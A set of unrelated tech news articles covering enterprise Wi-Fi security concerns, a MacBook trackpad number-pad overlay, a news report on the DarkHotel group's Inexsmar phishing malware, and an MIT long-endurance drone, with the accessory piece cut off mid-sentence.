More and more traffic is being carried via Wi-Fi networks, and as traffic figures rise, so do security concerns. Last year, 60% of mobile data traffic was offloaded onto the fixed network via Wi-Fi according to Cisco’s Visual Networking Index. Cisco predicts that by 2021, 50% of all IP traffic will be Wi-Fi (30% will be carried by fixed networks and 20% via cellular networks).

Security for that traffic is becoming more important, mainly because enterprises utilize Wi-Fi for business-critical services and applications. Here are three considerations for Wi-Fi security:

1.Consider Internet of Things (IoT) devices. As more devices get connected, the relationship of those devices to the corporate network or the open Internet must be examined with an eye toward security.

“Without a doubt, the number one way that IoT devices are connecting to the Internet is Wi-Fi,” said Ryan Orsi, director of strategic alliances at Wi-Fi security company WatchGuard Technologies.  He said that customers are coming to his business asking how they can prevent devices such as security cameras, DVRs and other connected devices from being the next zombie recruits in a Mirai-botnet-like attack. While IoT vendors are bringing more and more devices to market at lower prices, Orsi noted, there are no security regulations around such devices outside of the Food and Drug Administration requirements for health-related devices. Some organizations such as ICSA Labs have been attempting to fill that gap by offering security certification for IoT devices.

Adlane Fellah, managing director of Wi-Fi360, said that the number one concern for IoT in an industrial environment is security. He emphasized that Wi-Fi can play a crucial role “to enable better and easier securitization of IoT devices, so that [end users] don’t have to be programmers to make them safe and reliable — and that is as important for the home as it is for industrial applications.”

2.Consider that employees may find security workarounds. When employees work both remotely and in the office, they need secure ways to access their applications or transfer files — or they’ll use unsafe ones, relying on public Wi-Fi or tethering to a personal LTE device to create a potentially unsecured Wi-Fi hotspot, for example. iPass’ 2017 Mobile Security report found that on a global basis, 75% of enterprises still allow or encourage the use of MiFi devices — but in France, 29% of businesses have banned them because of security concerns.

At last year’s Republican National Convention, security company Avast set up several experimental, unauthorized Wi-Fi access points to see how many users would connect to networks with common names like “ATTWifi” or “Google Starbucks.” “Over the course of a day, Avast saw more than 1.6Gbs transferred from more than 1,200 users,” the company reported. “Moreover, 68.3% of users‘ identities were exposed when they connected, and 44.5% of Wi-Fi users checked their emails or chatted via messenger apps.”

3.Consider that some employees may be more vulnerable to attack than others. iPass’ mobile security report found that 40% of enterprises worry that their C-level executives could be hacked while using public Wi-Fi outside of the office.

“The grim reality is that C-level executives are by far at the greatest risk of being hacked outside of the office,” said Raghu Konka, VP of engineering at iPass, in a comment on the mobile security report results. “They are not your typical 9-5 office workers. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker.
​
“Organizations are more aware of the mobile security threat than ever, but they still struggle to find the balance between safety and productivity,” Konka added. “While businesses understand that free public Wi-Fi hotspots can empower employees to do their job and be more productive, they are also fearful of the potential security threat.”

When it comes to design, you would be hard pressed to criticize Apple. Everything the company makes is both beautiful and highly functional. But even Apple can’t cover every base. For instance, you cannot realistically squeeze a full number keypad into a MacBook. You can buy plug-in pads — but that means you need a spare USB port and a bigger bag. Alternatively, you could just use Nums. 

Nums is an ultra-thin number glass film that comes with an application powered by patented algorithms. It transforms your trackpad into a number pad, it launches your favorite apps and websites with just a swipe, and it protects your delicate laptop trackpad from scratches and other damage.

This thin piece of glass turns your trackpad into a dedicated number pad. It’s compatible with pre-2016 and current MacBook models and features the numbers 0-9 plus multiple symbols and an enter key.

Like all the best inventions, this glass plate keeps things simple. It doesn’t work with Bluetooth, and there is no battery to charge. But that’s fine, because this little accessory helps you input numbers, launch apps and protect your MacBook. To use Apple’s catch phrase, “It just works!”

To start punching in numbers, you simply place Nums over the touchpad of your MacBook. The magic is made possible by the special Nums software. This gives your MacBook numerical superpowers, so you can punch in numbers at will. The software also integrates with macOS.
​
The folks behind Nums say that you can more than double your number typing speed with this accessory. Furthermore, you will reduce your finger movement by 66%. You can pre-order the devic

An advanced hacking and cyberespionage campaign against high-value targets has returned.

The so-called 'DarkHotel' group has been active for over a decade, with a signature brand of cybercrime that targets business travelers with malware attacks, using the Wi-Fi in luxury hotels across the globe.

Hotel Wi-Fi hotspots are compromised in order to help deliver the payload to the selected pool of victims. The exact methods of compromise remain uncertain, but cybersecurity experts believe it involves attackers remotely exploiting vulnerabilities in server software or infiltrating the hotel and gaining physical access to the machines.

Those behind the campaign have continually evolved their tactics and malware payloads, blending phishing and social engineering with a complex Trojan, in order to conduct espionage on corporate research and development personnel, CEOs, and other high-ranking corporate officials.

But now the actors behind DarkHotel have changed tactics again, using a new form of malware known as Inexsmar to attack political targets. Researchers at Bitdefender – who've analyzed the malware strain – have linked the Inexsmar campaign to DarkHotel because of similarities with payloads delivered by previous campaigns.

In common with other espionage campaigns, the Inexsmar attack begins with high-level phishing emails individually designed to be interesting and convincing to the target. "The social engineering part of the attack involves a very carefully crafted phishing email targeted to one person at a time," Bogdan Botezatu, senior e-threat analyst at Bitdefender, told ZDNet.

Researchers remain uncertain about who is being targeted by the campaign – and the malware sample doesn't provide clues about this – but the nature of the phishing emails point towards government and political targets.

Within the email is a self-extracting archive package, winword.exe, which when executed begins the Trojan downloader process.

In order to avoid the victim getting suspicious, the downloader opens a decoy Word document called 'Pyongyang Directory Group email SEPTEMBER 2016 RC_Office_Coordination_Associate.docx'.

It shows a list of supposed contacts in the North Korean capital, with references to organizations including FAO, UNDP, UN, UNICEF, and WFP. It even contains warnings about spammers and ensuring privacy – with the victim reading this just as their privacy is being compromised by hackers.

In order to prevent detection, the malware is downloaded in stages – another element of the campaign which links it to DarkHotel. The first stage of the downloader even hides malicious codes and strings inside an otherwise legitimate OpenSSL binary by statically linking the malicious code to the otherwise unrelated library code.

Following this, the malware runs a mshta.exe operation – a legitimate Microsoft HTML Application host needed to execute .HTA files – to download the second part of the payload and compromise the target with the Trojan malware.

Researchers suggest the multi-stage Trojan download is an evolutionary step to keep the malware competitive as victims' defenses improve.

"This approach serves their purpose much better as it both assures the malware stays up to date via system persistence – not achievable directly using an exploit, and giving the attacker more flexibility in malware distribution," says the paper by malware researchers Cristina Vatamanu, Alexandru Rusu, and Alexandru Maximciuc.

DarkHotel is a highly sophisticated hacking operation, stockpiling digital certificates to aid in the distribution of malware and deploy backdoors with code hidden under many layers of protection.

The group is careful to cover their tracks but the nature of the attacks and the way DarkHotel picks victims potentially indicates involvement of a nation state actor.
​
"Attribution is usually difficult with this type of attack, but its complexity and the cherry-picked victims show that it is likely a state-backed threat with serious skills and resources," said Botezatu.

Last month, a team of MIT engineers launched Jungle Hawk Owl from the back of a compact car. It was the first flight for the 24-foot-wide drone, which the team believes is capable of staying in the air for five days on a single tank of gas. 
The craft was designed to address a challenge posed by the U.S. Air Force. The teams were asked to develop a UAV (unmanned aerial vehicle) powered by solar energy that was able to stay in the air for long periods. The idea was to design a vehicle that could help deliver communications to areas impacted by natural disasters or other emergencies. Weather balloons have traditionally been the choice, but they drift with the wind and often don’t stay in the air long enough to be effective.

Not long after they began to work on the problem, the team abandoned the solar option. According to team co-lead, Professor Warren Hoburg, current solar technologies would require a much larger drone with a much larger surface area for panels, coupled with a large, heavy battery. Solar also runs into issues during the winter months and at latitudes far from the equator because of shortened daylight hours.

The winning team’s final design was built out of lightweight materials like carbon fiber and Kevlar, weighing a total of 55 pounds empty and 150 pounds with payload and a tank full of gas. The parts can be easily dissembled, and shipped to affected areas and the payload is the perfect size for carrying a shoebox-sized communication device designed by MIT’s Lincoln Labs, which helped support the project. 

Currently, the school is working with the FAA for permission to keep the drone in the air for the full five days as it continues its testing over the summer.